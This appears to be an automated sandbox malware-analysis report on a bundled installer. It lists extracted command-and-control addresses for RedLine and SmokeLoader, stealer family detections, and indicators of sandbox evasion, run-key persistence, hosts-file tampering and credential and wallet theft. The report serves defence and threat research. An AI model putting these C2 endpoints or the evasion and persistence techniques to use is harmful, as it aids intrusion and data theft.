Overview
Score: 10
Static
Behavioral tasks (setup_x86_...ll.exe):
platform | score
windows7_x64 | 10
windows7_x64 | 8
windows7_x64 | 10
windows11_x64 | 10
windows10_x64 | 10
windows10_x64 | 10
windows10_x64 | 10
windows10_x64 | 10
Resubmissions:
submitted | task id | score
05-10-2021 16:27 | 211005-tx24csaah9 | 10
04-10-2021 16:37 | 211004-t43cpsgfe7 | 10
04-10-2021 07:39 | 211004-jhgtrsfhf8 | 10
03-10-2021 18:09 | 211003-wryvvsffgk | 10
02-10-2021 23:31 | 211002-3hwsgaehhl | 10
02-10-2021 06:10 | 211002-gxfh5sdgg7 | 10
01-10-2021 13:44 | 211001-q16deabhek | 10
Analysis
max time kernel: 1803s
max time network: 1794s
platform: windows11_x64
resource: win11
submitted: 04-10-2021 16:37
Static task: static1
Behavioral task: behavioral1, sample setup_x86_x64_install.exe, resource win7-ja-20210920
Behavioral task: behavioral2, sample setup_x86_x64_install.exe, resource win7v20210408
Behavioral task: behavioral3, sample setup_x86_x64_install.exe, resource win7-de-20210920
Behavioral task: behavioral4, sample setup_x86_x64_install.exe, resource win11
Behavioral task: behavioral5, sample setup_x86_x64_install.exe, resource win10v20210408
Behavioral task: behavioral6, sample setup_x86_x64_install.exe, resource win10-ja-20210920
General
Target: setup_x86_x64_install.exe
Size: 6.4MB
MD5: c6e46aa3d6424b03e0a4ccb193d3eade
SHA1: c8b49055743fa7b4d6a982aea26efb627bb1f2e1
SHA256: 5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156
SHA512: 06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e
Malware Config
Extracted: redline
Botnet: ANI
C2: 45.142.215.47:27643
Extracted: smokeloader
Version: 2020
C2:
http://fiskahlilian16.top/
http://paishancho17.top/
http://ydiannetter18.top/
http://azarehanelle19.top/
http://quericeriant20.top/
Signatures
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4800 | 4884 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6124 | 4884 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 7400 | 4884 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8212 | 4884 | rundll32.exe |
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 2 IoCs
Processes:
resource | yara_rule
behavioral4/memory/5696-294-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral4/memory/5696-293-0x0000000000000000-mapping.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
Socelars Payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10720d229511df563.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10720d229511df563.exe | family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess 29 IoCs
Arkei Stealer Payload 1 IoCs
Processes:
resource | yara_rule
behavioral4/memory/6396-509-0x0000000000400000-0x0000000004A15000-memory.dmp | family_arkei
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
Vidar Stealer 3 IoCs
Processes:
resource | yara_rule
behavioral4/memory/2340-546-0x00000000008C0000-0x0000000000994000-memory.dmp | family_vidar
behavioral4/memory/6304-555-0x00000000008A0000-0x0000000000976000-memory.dmp | family_vidar
behavioral4/memory/6512-562-0x0000000000820000-0x00000000008F4000-memory.dmp | family_vidar
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libstdc++-6.dll | aspack_v212_v242
Blocklisted process makes network request 43 IoCs
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Sayma.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Adam.exe
Executes dropped EXE 64 IoCs
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
Loads dropped DLL 64 IoCs
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10d184202996a0d7f.exe | themida
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10d184202996a0d7f.exe | themida
behavioral4/memory/5000-253-0x0000000000F70000-0x0000000000F71000-memory.dmp | themida
C:\Users\Admin\AppData\Roaming\1258873.scr | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Senanebekae.exe\"" | Sayma.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\PowerControl\\Maqovolycu.exe\"" | Adam.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 8752590.scr
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 7424173.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 8FD5.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 1258873.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6h7TGlpVEfKxMzs0E3XQolaC.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | mz3j1eZvlG3xLyLgnJGzG2iz.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 4726559.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 3027623.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 1361734.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 8280124.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 8926187.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Fri10d184202996a0d7f.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 4051319.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ZnOJUZYeiLcgg2qi3EKdqjT5.exe
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
1 | ipinfo.io
13 | ip-api.com
13 | ipinfo.io
21 | ipinfo.io
110 | ipinfo.io
143 | ipinfo.io
253 | ip-api.com
Drops file in System32 directory 10 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
pid | process
5000 | Fri10d184202996a0d7f.exe
5356 | 1258873.scr
4140 | 4051319.scr
6348 | mz3j1eZvlG3xLyLgnJGzG2iz.exe
6480 | 6h7TGlpVEfKxMzs0E3XQolaC.exe
6520 | ZnOJUZYeiLcgg2qi3EKdqjT5.exe
6820 | 4726559.scr
2188 | 7424173.scr
6040 | 3027623.scr
840 | 1361734.scr
5860 | 8280124.scr
6392 | 8926187.scr
6444 | 8FD5.exe
Suspicious use of SetThreadContext 9 IoCs
Processes:
description | pid | process | target process
PID 4648 set thread context of 5696 | 4648 | Fri106e757f6d75.exe | Fri106e757f6d75.exe
PID 6488 set thread context of 1688 | 6488 | e3pqPskkJwLs8LEChQJEssCE.exe | e3pqPskkJwLs8LEChQJEssCE.exe
PID 6336 set thread context of 6196 | 6336 | svchost.exe | RegSvcs.exe
PID 492 set thread context of 2176 | 492 | services64.exe | explorer.exe
PID 6716 set thread context of 5388 | 6716 | 34C3.exe | 34C3.exe
PID 6344 set thread context of 3960 | 6344 | Conhost.exe | 2987.exe
PID 6180 set thread context of 2600 | 6180 | IfZhM4uqhiGPN0yi98muF9eW.exe | IfZhM4uqhiGPN0yi98muF9eW.exe
PID 5508 set thread context of 8036 | 5508 | tmpAB0B_tmp.exe | tmpAB0B_tmp.exe
PID 8132 set thread context of 13792 | 8132 | F8D2.exe | RegAsm.exe
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 31 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\Installer\MSIC963.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID1C1.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File opened for modification | C:\Windows\Tasks\SA.DAT | svchost.exe
File opened for modification | C:\Windows\Installer\MSI8483.tmp | msiexec.exe
File created | C:\Windows\SystemTemp\~DF014463F454FF37B2.TMP | msiexec.exe
File opened for modification | C:\Windows\Tasks\SA.DAT | svchost.exe
File opened for modification | C:\Windows\Tasks\SMBbvCSuKLI.job | rundll32.exe
File opened for modification | C:\Windows\Installer\37214.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID6E4.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIFF8E.tmp | msiexec.exe
File created | C:\Windows\Tasks\SMBbvCSuKLI.job | rundll32.exe
File created | C:\Windows\Installer\37214.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID4FF.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI96B4.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI9FEE.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI9916.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI9D6D.tmp | msiexec.exe
File created | C:\Windows\Tasks\AdvancedWindowsManager #1.job | MsiExec.exe
File opened for modification | C:\Windows\Installer\MSIF7CD.tmp | msiexec.exe
File created | C:\Windows\SystemTemp\~DFAD0D03E9D764A901.TMP | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIA3F7.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIA688.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID049.tmp | msiexec.exe
File created | C:\Windows\SystemTemp\~DF00ECE9D2F899593B.TMP | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID6F5.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIEAFB.tmp | msiexec.exe
File created | C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} | msiexec.exe
File created | C:\Windows\SystemTemp\~DFFAE9AE0655247B55.TMP | msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 28 IoCs
Processes:
pid | pid_target | process | target process
884 | 5732 | WerFault.exe | ShadowVPNInstaller_t3.exe
6552 | 5404 | WerFault.exe | rundll32.exe
6536 | 5148 | WerFault.exe | Fri10720d229511df563.exe
6452 | 5404 | WerFault.exe | rundll32.exe
6188 | 4736 | WerFault.exe | Fri1015b9a4e0b.exe
2552 | 6544 | WerFault.exe | CTutXdLZ4xbLs74URA0ecSII.exe
3192 | 5732 | WerFault.exe | ShadowVPNInstaller_t3.exe
5604 | 5280 | WerFault.exe | Fri10acd1e0a9e6.exe
7080 | 6288 | WerFault.exe | VQgrNhc4WsP27ikp84942S7c.exe
6988 | 5732 | WerFault.exe | ShadowVPNInstaller_t3.exe
5344 | 2340 | WerFault.exe | Firstoffer.exe
6780 | 6304 | WerFault.exe | 1U7rz2B7WbSFlXtvDg8Z5IbN.exe
7116 | 5732 | WerFault.exe | ShadowVPNInstaller_t3.exe
5296 | 6512 | WerFault.exe | ZwD24QUjPt3CXwW27xWlqIZe.exe
5612 | 6380 | WerFault.exe | uqqAcKDbb5l4Gg0p81LTojnE.exe
3024 | 5732 | WerFault.exe | ShadowVPNInstaller_t3.exe
6432 | 6200 | WerFault.exe | Fri105268dda3.exe
6316 | 5732 | WerFault.exe | ShadowVPNInstaller_t3.exe
6340 | 6372 | WerFault.exe | vOsoiDDO3Q_G73JC3fZnrc96.exe
6928 | 5540 | WerFault.exe | HkLf_4fWJBBP2aKw8B_EGPCJ.exe
5024 | 6340 | WerFault.exe | PlREWOPKJ6dQLCAu2xyyr7tT.exe
6300 | 6720 | WerFault.exe | YmLtMJXE5kpG5PRH_W7AZRIX.exe
2292 | 7084 | WerFault.exe | 6AF7.exe
7208 | 7420 | WerFault.exe | rundll32.exe
7932 | 7508 | WerFault.exe | E411.exe
15704 | 7340 | WerFault.exe | 2274.exe
8440 | 8248 | WerFault.exe | rundll32.exe
13928 | 13792 | WerFault.exe | RegAsm.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e3pqPskkJwLs8LEChQJEssCE.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e3pqPskkJwLs8LEChQJEssCE.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 2987.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 2987.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 2987.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e3pqPskkJwLs8LEChQJEssCE.exe

Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | PlREWOPKJ6dQLCAu2xyyr7tT.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | CYhWK6wGUBr_0KUI2pFoRj1Q.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | PlREWOPKJ6dQLCAu2xyyr7tT.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | UltraMediaBurner.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | 2285034.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | CYhWK6wGUBr_0KUI2pFoRj1Q.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | 2285034.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | PlREWOPKJ6dQLCAu2xyyr7tT.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | UltraMediaBurner.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
5372 | schtasks.exe
4772 | schtasks.exe
6276 | schtasks.exe
6224 | schtasks.exe
7476 | schtasks.exe
8144 | schtasks.exe
1460 | schtasks.exe
1096 | schtasks.exe

Delays execution with timeout.exe 2 IoCs
Processes:
pid | process
4028 | timeout.exe
6504 | timeout.exe

Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
pid | process
13176 | bitsadmin.exe
13236 | bitsadmin.exe

Enumerates system info in registry 2 TTPs 61 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | 2285034.scr
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | UltraMediaBurner.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | PlREWOPKJ6dQLCAu2xyyr7tT.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | 2285034.scr
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | UltraMediaBurner.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
